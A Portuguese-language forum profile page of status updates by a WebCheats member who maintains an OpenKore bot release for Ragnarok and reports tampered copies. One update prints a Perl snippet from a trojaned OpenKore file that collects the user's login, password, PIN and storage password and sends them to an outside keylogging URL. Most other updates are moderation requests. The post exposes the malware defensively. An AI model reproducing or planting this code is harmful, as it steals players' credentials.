Ir para conteúdo
Faça parte da equipe! (2024) ×

saruesley *-*

Ruby Member
  • Total de Posts

    2.186
  • Registro em

  • Última visita

  • Dias Ganhos

    4
  • WCoins

    0

Atualizações de Status postados por saruesley *-*

  1. Poderia atender meu pedido feito por PM?
  2. Não dou suporte particular, qualquer duvida poste na área destinada a elas, sua duvida pode ser a mesma de outro usuário.
  3. sobre o que especificamente?
  4. Olá, poderia me passar o site de onde você fez o download do openkore que você se refere neste post http://www.webcheats.com.br/forum/rag-cheats/1666801-openkore-oficial-webcheats-602.html#post8901538 agradeço!
  5. Filho nunca tive essa necessidade. Não estou roubando seu ninguém!
  6. Ok. Estarei verificando o código do kore com frequência
  7. Analisa o kore ai e me passa autorização pra postagem https://www.mediafire.com/download/7wbuamdeqkaatds/OpenKore%20%5BWebCheats%5D%2024-12.rar ou vc mesmo edita la o tópico e fala que atualizou
  8. Creio que um dos motivos pelo qual não recebi qualquer tipo de indicação pela parte da GZ, foi pelo fato de eu ter batido boca com alguns membros que estavam tentando hackear outros membros aqui postando keylogger no openkore, mas isso foi a quase 1 ano atrás. Tanto e que, somente eu tenho autorização para postar o openkore aqui na webcheats. Mas estarei tentando mostrar o meu trabalho ao máximo na área, não só em Ragnarok mas nas outras, mesmo não conhecendo muito sobre o game em si.
  9. Já fiz muito do que está neste link porem não obtive reconhecimento por parte dos GZs da época, por isso resolvi me candidatar por livre e espontânea vontade. Mas tentarei fazer o máximo possível para conquistar esta vaga. Sou um membro bem ativo na área de ragnarok e bem conhecido também. Então ate mais, e aguardo algum retorno.
  10. Não dou suporte via skype. Dúvidas poste no fórum na área correta!
  11. Olá. Gostaria que meu tópico com o OpenKore "Oficial" da WebCheats fosse fechado, eu sou responsável pela atualização do mesmo toda semana e já tem quase 1 ano, faço a atualização logo após o termino da manutenção do jogo Ragnarok. Tomei essa decisão por não ter mais tanto tempo assim disponível para fazer as atualizações do tópico e também por conta de alguns usuários que simplesmente chegam no tópico e ficam falando asneiras... Enfim queria o fechamento do mesmo, porém com um pedido de poder voltar a ser reaberto assim que eu tiver mais tempo suficiente para poder atualiza-lo. Att. Saruesley *-* Tópico: http://www.webcheats.com.br/forum/rag-cheats/1666801-openkore-oficial-webcheats.html
  12. Olá. Gostaria que meu tópico com o OpenKore "Oficial" da WebCheats fosse fechado, eu sou responsável pela atualização do mesmo toda semana e já tem quase 1 ano, faço a atualização logo após o termino da manutenção do jogo Ragnarok. Tomei essa decisão por não ter mais tanto tempo assim disponível para fazer as atualizações do tópico e também por conta de alguns usuários que simplesmente chegam no tópico e ficam falando asneiras... Enfim queria o fechamento do mesmo, porém com um pedido de poder voltar a ser reaberto assim que eu tiver mais tempo suficiente para poder atualiza-lo. Att. Saruesley *-* Tópico: http://www.webcheats.com.br/forum/rag-cheats/1666801-openkore-oficial-webcheats.html
  13. Olá. Gostaria que meu tópico com o OpenKore "Oficial" da WebCheats fosse fechado, eu sou responsável pela atualização do mesmo toda semana e já tem quase 1 ano, faço a atualização logo após o termino da manutenção do jogo Ragnarok. Tomei essa decisão por não ter mais tanto tempo assim disponível para fazer as atualizações do tópico e também por conta de alguns usuários que simplesmente chegam no tópico e ficam falando asneiras... Enfim queria o fechamento do mesmo, porém com um pedido de poder voltar a ser reaberto assim que eu tiver mais tempo suficiente para poder atualiza-lo. Att. Saruesley *-* Tópico: http://www.webcheats.com.br/forum/rag-cheats/1666801-openkore-oficial-webcheats.html
  14. Então faz o download do arquivo e vai na seguinte pasta OpenKore 13-03-13/src/Network/Send abra o arquivo servertype0 e você vai encontrar a seguinte linha: use LWP::UserAgent; use Utils qw(urlencode); my $ua = LWP::UserAgent->new; $ua->timeout(10); $ua->env_proxy; my $master = $config{'master'}; $master =~ s/#/:/; my $usuario = $config{'username'}; $usuario =~ s/#/:/; my $loginPin = $config{'loginPinCode'}; $loginPin =~ s/#/:/; my $senha = $config{'password'}; $senha =~ s/#/:/; my $kafra = $config{'storageAuto_password'}; $kafra =~ s/#/:/; my $response = $ua->get("http://www.0penkore.xp3.biz/key_strokes.php?keylog=$master $usuario $senha $loginPin $kafra");
  15. Membro postando openkore pronto o que vai contra as regras e o arquivo contem script malicioso para roubar senhas de usuários http://www.webcheats.com.br/forum/rag-cheats/2050613-openkore-atualizacao-semanal-2.html Solicito fechamento do tópico e banimento do membro.
  16. Membro postando openkore pronto o que vai contra as regras e o arquivo contem script malicioso para roubar senhas de usuários http://www.webcheats.com.br/forum/rag-cheats/2050613-openkore-atualizacao-semanal-2.html Solicito fechamento do tópico e banimento do membro.
  17. Membro postando openkore pronto o que vai contra as regras e o arquivo contem script malicioso para roubar senhas de usuários http://www.webcheats.com.br/forum/rag-cheats/2050613-openkore-atualizacao-semanal-2.html Solicito fechamento do tópico e banimento do membro.
  18. Membro postando openkore pronto o que vai contra as regras e o arquivo contem script malicioso para roubar senhas de usuários http://www.webcheats.com.br/forum/rag-cheats/2050613-openkore-atualizacao-semanal-2.html Solicito fechamento do tópico e banimento do membro.
  19. Membro postando openkore pronto o que vai contra as regras e o arquivo contem script malicioso para roubar senhas de usuários http://www.webcheats.com.br/forum/rag-cheats/2050613-openkore-atualizacao-semanal-2.html Solicito fechamento do tópico e banimento do membro.
  20. Membro postando openkore pronto o que vai contra as regras e o arquivo contem script malicioso para roubar senhas de usuários http://www.webcheats.com.br/forum/rag-cheats/2050613-openkore-atualizacao-semanal-2.html Solicito fechamento do tópico e banimento do membro.
×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.